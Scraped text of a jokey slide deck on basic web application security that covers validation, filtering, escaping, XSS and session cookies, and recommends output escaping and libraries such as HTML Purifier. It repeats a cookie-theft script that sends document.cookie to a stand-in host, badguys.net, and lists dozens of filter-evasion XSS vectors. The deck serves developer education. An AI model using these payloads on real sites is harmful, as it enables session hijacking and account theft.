Upload
lyneth
View
26
Download
0
Embed Size (px)
DESCRIPTION
Basic Web Application Security. User Input. Kick Your Arse. Three Ways. (All Awesome). Validation. Passive. (No touchy-touchy). This is a Number. 2. This is not a Number. a. This is really not a Number. alert(‘ loldongs ’). Filtering. Destructive. (One-Way Street). - PowerPoint PPT Presentation
Citation preview
Basic WebApplication
Security
User Input
Kick Your Arse
Three Ways(All Awesome)
Validation
Passive(No touchy-touchy)
This is a Number.
2
This is not a Number.
a
This is really not a Number.
<script>alert(‘loldongs’)</script>
Filtering
Destructive(One-Way Street)
Only letting the good stuff in.
or
Keeping out the bad stuff.
What’s the diff?(Bro.)
Both can be error-prone...
White-Listing Usability Problems
What happens whenyou screw it up?
Black-Listing Security Problems
(Always a trade-off.)
Escaping
TransportPoint A Point B
Data will be the same on both sides.
Different Media,Different Escaping
HTML
<b>Huh.</b>
<p><i><b>Huh.</b></i></p>
<b>Huh</b>
SQL
Sam O’Brien
INSERT INTO mah_peeps (name)VALUES (‘Sam O\’Brien‘);
1, Sam O’Brien, 2010-09-02 18:30:00
XSS(Cross-Site Scripting)
(XTREME Site Scripting)
SS
Sticking Scripts Where They Don’t Belong.
You there, down the back.Stop sniggering.
<script>alert(‘HACKED BY LOLDONGS’)
</script>
Amateurs!
<script>alert(document.cookie)
</script>
Hmm.
<script>document.write(‘<img
src=“http://badguys.net/logthis.php?d=‘+document.cookie+’”
style=“display:none;”>’);</script>
Oh shit.
Why is this uncool?
(Yeah! Why?)
<script>document.write(‘<img
src=“http://badguys.net/logthis.php?d=‘+document.cookie+’”
style=“display:none;”>’);</script>
Ooooh shit.
<script>document.write(‘<img
src=“http://badguys.net/logthis.php?d=‘+document.cookie+’”
style=“display:none;”>’);</script>
Oooooooooooh shit.
<script>document.write(‘<img
src=“http://badguys.net/logthis.php?d=‘+document.cookie+’”
style=“display:none;”>’);</script>
Oooooooooooooooooh shit.
Why is this really uncool?
(Because shut up.)
HTTP
Hyper-Text Thingy I-forgot-again
Stateless
No Idea Who You Are.
It can guess.(Badly.)
IP AddressBrowser User-Agent
Sends a cookie with each request.
(A basket of goodies that the browser sends faithfully every
request.)
The Server puts a unique ID in the basket.
PHPSESSID=123your456mum789
__utma=12948.23.4211414.5553
is_a_furry=1
Browser sends the ID every request.
PHPSESSID=123your456mum789
<script>document.write(‘<img
src=“http://badguys.net/logthis.php?d=‘+document.cookie+’”
style=“display:none;”>’);</script>
Look again.
THEY HAVE YOUR COOKIE.
Ooooooooooooooooooooooo-
Preventing Shenanigans
HTML
Validation Really Hard.
HTML
Filtering Still Really Hard.
Use a library, eg. HTML Purifier.
HTML
Escaping Dead Easy.
Most languages have stuff to handle this, eg.
htmlentities(), cgi.escape(), CGI.escape()
How hard is filtering?
(It’s just <script>, right?)
THIS HARD.
<IMG SRC=javascript:alert('a')>
<img src=javascript:alert("a")>
<img “””><script>alert('a')</script>”>
<IMG
SRC=javascr
ipt:ale
14;
t('XSS')>
<IMG
SRC=javascr
ipt:aler
t('XSS')
>
<IMG SRC="jav ascript:alert('a');“>
(Well, then.)
<IMG SRC="jav	asœript:alert('XSS');">
<IMG SRC="jav
ascript:alert('XSS');">
<SCR\0IPT>alert('a')</SCR\0IPT>
<SCRIPT/a SRC="http://foo/x.js"></SCRIPT>
<img onmouseover!#$%&=alert('a')>
<<SCRIPT>alert("a");//<</SCRIPT>
<SC<SCRIPT>RIPT>alert('a');</SC</SCRIPT>RIPT>
<SC\0RIPT SRC=http://foo/x.js?<B>
<script src=//foo/x.js>
<img src=”javascript:alert('a')”
THIS HARD.
<iframe src=http://foo/x.html <
<body background=”javascript:alert('a')”>
<BODY ONLOAD=alert('a')>
<img dynsrc=”javascript:alert('a')”>
<img lowsrc=”javascript:alert('a')”>
<BGSOUND SRC=javascript:alert('a')>
<BR SIZE=”&{alert('a')}”>
<LAYER SRC=”http://foo/x.html”></LAYER>
<link rel=”stylesheet” href=”javascript:alert('a');”>
<XSS STYLE="behavior: url(xss.htc);">
<STYLE>BODY{-moz-binding:url("http://foo/
x.xml#xss")}</STYLE>
(Well, then.)
<IMG SRC='vbscript:msgbox(“a”)'>
<img src=”livescript:alert('a')”>
žscriptualert(EXSSE)ž/scriptu (US-ASCII encoding
evasion)
<META HTTP-EQUIV=”refresh”
CONTENT=”0;url=javascript:alert('a');”>
<META HTTP-EQUIV="refresh"
CONTENT="0;url=data:text/html;base64,
PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
<FRAMESET><FRAME
SRC="javascript:alert('XSS');"></FRAMESET>
<TABLE BACKGROUND="javascript:alert('XSS')">
THIS HARD.<DIV STYLE="background-image:
url(javascript:alert('a'))">
<DIV STYLE="background-image:\0075\0072\006C\
0028'\006a
\
0061\0076\0061\0073\0063\0072\0069\0070\0074\003
a\0061
\006c\
0065\0072\0074\0028.1027\0058.1053\0053\0027\002
9'\0029">
<DIV STYLE="background-image:
url(javascript:alert('a'))">
<DIV STYLE="width: expression(alert('a'));">
<STYLE>@im\port'\ja\vasc\ript:alert("a")';</STYLE>
<IMG STYLE="xss:expr/*XSS*/ession(alert('a'))">
exp/*<A
STYLE='no\xss:noxss("*//*");xss:ex/*XSS*/
/*/*/pression(alert("a"))'>
<STYLE TYPE="text/javascript">alert('a');</STYLE>
(Well, then.)
<STYLE>.x{background-
image:url("javascript:alert('a')");}</STYLE><A
CLASS=X></A>
<BASE HREF="javascript:alert('a');//">
<OBJECT TYPE="text/x-scriptlet"
DATA="http://foo/x.html"></OBJECT>
<EMBED SRC="http://foo/xss.swf"
AllowScriptAccess="always"></EMBED>
<EMBED
SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczp
zd....jwvc3ZnPg=="
type="image/svg+xml"
AllowScriptAccess="always"></EMBED>
<XML ID=I><X><C><![CDATA[<IMG
SRC="javas]]><![CDATA[cript:alert('XSS');">]]>
</C></X></xml><SPAN DATASRC=#I DATAFLD=C
DATAFORMATAS=HTML></SPAN>
And one last thing.
(Groan.)
Remember <script>alert()</script>
?
(Yes, I do. Shut up.)
alert() can be ANY JAVASCRIPT.
(Yes, and...?)
Do you have any forms on your page?
(Yes.)
Do you have any javascript functions your site uses to do anything
useful?
(... Yes.)
Do your site make any AJAX calls to do anything useful?
(... Oh.)
That injected code can trigger forms, run
javascript functions, or make AJAX calls.
(... Oooooh.)
Send someone to a link that looks like:
http://my.site/?user=<script>doStuff();</script>
(... Oooooooooh.)
Or store something that will output this on someone’s profile
page:
<script>doStuff();</script>
(... Oooooooooooooooh.)
... And you’re hosed.
(Shit.)
The Human Element
Touchy-Feely Commie Bullshit.
a
Touchy-Feely Commie Bullshit.